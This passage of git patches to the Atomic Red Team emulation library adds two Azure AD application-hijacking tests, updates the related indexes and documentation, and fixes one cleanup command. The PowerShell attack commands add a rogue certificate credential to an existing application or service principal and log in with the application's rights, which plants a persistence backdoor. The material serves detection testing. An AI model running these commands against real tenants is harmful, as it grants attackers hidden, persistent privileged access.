dependencies: + - description: | + AzureAD module must be installed. + prereq_command: | + if (Get-Module AzureAD) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" + if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } + # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + + cleanup_command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" + $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId + foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId + } + } + Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item + rm "#{path_to_cert}\#{service_principal_name}.pfx" + + name: powershell + elevation_required: false + +- name: Azure AD Application Hijacking - App Registration + auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a + description: | + Add a certificate to an Application through its App Registration. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + application_name: + description: Name of the targeted application + type: String + default: SuperApp + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: $env:TEMP + dependency_executor_name: powershell + dependencies: + - description: | + AzureAD module must be installed. + prereq_command: | + if (Get-Module AzureAD) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $app = Get-AzureADApplication -Searchstring "#{application_name}" + if ($app -eq $null) { Write-Warning "Application not found"; exit } + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + + cleanup_command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $app = Get-AzureADApplication -Searchstring "#{application_name}" + $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId + foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId + } + } + Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item + rm "#{path_to_cert}\#{application_name}.pfx" + + name: powershell + elevation_required: false + - name: AWS - Create Access Key and Secret Key auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 description: | @@ -28,4 +193,7 @@ atomic_tests: access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` aws iam delete-access-key --access-key-id $access_key --user-name #{username} rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds - name: sh \ No newline at end of file + name: sh + + + From 6c2c28f497fc21ef0d5ad1cf6bd74518bc54c14e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 8 Jul 2021 17:23:32 +0000 Subject: [PATCH 05/19] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6a2b05f5..1b4d0b87 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -729,3 +729,5 @@ b4988cad-6ed2-434d-ace5-ea2670782129 a8aa2d3e-1c52-4016-bc73-0f8854cfa80a c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 5a51ef57-299e-4d62-8e11-2d440df55e69 +b8e747c3-bdf7-4d71-bce2-f1df2a057406 +a12b5531-acab-4618-a470-0dafb294a87a From b51f415e30c671c7422a621a814ec2f7cc3b9790 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 8 Jul 2021 17:23:38 +0000 Subject: [PATCH 06/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 4 +- atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- atomics/Indexes/index.yaml | 153 ++++++++++++++ atomics/T1098.001/T1098.001.md | 189 +++++++++++++++++- 6 files changed, 352 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d5a392a7..ea2dfdec 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -495,7 +495,9 @@ persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh -persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh +persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell +persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell +persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 61ce7560..d25c3572 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -154,7 +154,9 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh -persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh +persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell +persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell +persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index debc08d8..8b4533db 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -854,7 +854,9 @@ - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) - - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws] + - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad] + - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad] + - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 4517c9e3..678b201a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -413,7 +413,9 @@ - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md) - - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws] + - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad] + - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad] + - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws] - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - Atomic Test #1: At - Schedule a job [linux] - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c3270f93..2096530e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37157,6 +37157,159 @@ persistence: - Azure AD identifier: T1098.001 atomic_tests: + - name: Azure AD Application Hijacking - Service Principal + auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406 + description: | + Add a certificate to an Application through its Service Principal. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + service_principal_name: + description: Name of the targeted service principal + type: String + default: SuperSP + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: "$env:TEMP" + dependency_executor_name: powershell + dependencies: + - description: 'AzureAD module must be installed. + +' + prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" + if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } + # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString + -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName + System.Management.Automation.PSCredential -ArgumentList \"#{username}\", + $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal + -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential + -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) + -eq \"AtomicTest\") {\n Remove-AzureADServicePrincipalKeyCredential -ObjectId + $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n" + name: powershell + elevation_required: false + - name: Azure AD Application Hijacking - App Registration + auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a + description: | + Add a certificate to an Application through its App Registration. + The certificate can then be used to authenticate as the application and benefit from its rights. + An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Azure AD username + type: String + default: jonh@contoso.com + password: + description: Azure AD password + type: String + default: p4sswd + application_name: + description: Name of the targeted application + type: String + default: SuperApp + certificate_password: + description: Password of the new certificate + type: string + default: Passw0rd + path_to_cert: + description: Path of the new certificate, locally stored + type: string + default: "$env:TEMP" + dependency_executor_name: powershell + dependencies: + - description: 'AzureAD module must be installed. + +' + prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + command: | + Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $app = Get-AzureADApplication -Searchstring "#{application_name}" + if ($app -eq $null) { Write-Warning "Application not found"; exit } + $certNotAfter = (Get-Date).AddDays(2) + $credNotAfter = (Get-Date).AddDays(1) + $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint + $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText + Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd + + $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + + New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + + Start-Sleep -s 30 + $tenant=Get-AzureADTenantDetail + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" + Write-Host "End of Hijacking" + cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString + -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName + System.Management.Automation.PSCredential -ArgumentList \"#{username}\", + $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication + -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential + -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) + -eq \"AtomicTest\") {\n Remove-AzureADApplicationKeyCredential -ObjectId + $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n" + name: powershell + elevation_required: false - name: AWS - Create Access Key and Secret Key auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 description: 'Adversaries create their own new access and secret keys to programatically diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md index c7e59069..94e5dd99 100644 --- a/atomics/T1098.001/T1098.001.md +++ b/atomics/T1098.001/T1098.001.md @@ -8,12 +8,197 @@ In infrastructure-as-a-service (IaaS) environments, after gaining access through ## Atomic Tests -- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key) +- [Atomic Test #1 - Azure AD Application Hijacking - Service Principal](#atomic-test-1---azure-ad-application-hijacking---service-principal) + +- [Atomic Test #2 - Azure AD Application Hijacking - App Registration](#atomic-test-2---azure-ad-application-hijacking---app-registration) + +- [Atomic Test #3 - AWS - Create Access Key and Secret Key](#atomic-test-3---aws---create-access-key-and-secret-key)
-## Atomic Test #1 - AWS - Create Access Key and Secret Key +## Atomic Test #1 - Azure AD Application Hijacking - Service Principal +Add a certificate to an Application through its Service Principal. +The certificate can then be used to authenticate as the application and benefit from its rights. +An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** b8e747c3-bdf7-4d71-bce2-f1df2a057406 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| service_principal_name | Name of the targeted service principal | String | SuperSP| +| certificate_password | Password of the new certificate | string | Passw0rd| +| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" +if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } +# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long +$certNotAfter = (Get-Date).AddDays(2) +$credNotAfter = (Get-Date).AddDays(1) +$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint +$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText +Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd + +$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) +$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + +New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + +Start-Sleep -s 30 +$tenant=Get-AzureADTenantDetail +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb +Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" +Write-Host "End of Hijacking" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}" +$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId +foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId + } +} +Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item +rm "#{path_to_cert}\#{service_principal_name}.pfx" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AzureAD) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
+
+ +## Atomic Test #2 - Azure AD Application Hijacking - App Registration +Add a certificate to an Application through its App Registration. +The certificate can then be used to authenticate as the application and benefit from its rights. +An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** a12b5531-acab-4618-a470-0dafb294a87a + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| application_name | Name of the targeted application | String | SuperApp| +| certificate_password | Password of the new certificate | string | Passw0rd| +| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$app = Get-AzureADApplication -Searchstring "#{application_name}" +if ($app -eq $null) { Write-Warning "Application not found"; exit } +$certNotAfter = (Get-Date).AddDays(2) +$credNotAfter = (Get-Date).AddDays(1) +$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint +$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText +Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd + +$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) +$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + +New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter + +Start-Sleep -s 30 +$tenant=Get-AzureADTenantDetail +$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb +Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" +Write-Host "End of Hijacking" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$app = Get-AzureADApplication -Searchstring "#{application_name}" +$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId +foreach ($cred in $credz) { + if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq "AtomicTest") { + Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId + } +} +Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item +rm "#{path_to_cert}\#{application_name}.pfx" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +if (Get-Module AzureAD) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
+
+ +## Atomic Test #3 - AWS - Create Access Key and Secret Key Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised **Supported Platforms:** Iaas:aws From 79e706f2dfcb95a381de87cdec76415cfd9403cd Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Fri, 9 Jul 2021 09:34:32 -0600 Subject: [PATCH 07/19] fix cleanup cmd as per issue #1543 (#1548) --- atomics/T1136.002/T1136.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml index 4bdc79bb..c8a4875e 100644 --- a/atomics/T1136.002/T1136.002.yaml +++ b/atomics/T1136.002/T1136.002.yaml @@ -81,6 +81,6 @@ atomic_tests: $User.Save() $User cleanup_command: | - net user "#{username}" >nul 2>&1 /del /domain + cmd /c "net user #{username} /del >nul 2>&1" name: powershell elevation_required: false # Requires a user to be a Domain Admin! From d50e69b5c86284b10f60d4d19a4ab0219e0a0bc7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 9 Jul 2021 15:35:13 +0000 Subject: [PATCH 08/19] Generate docs from 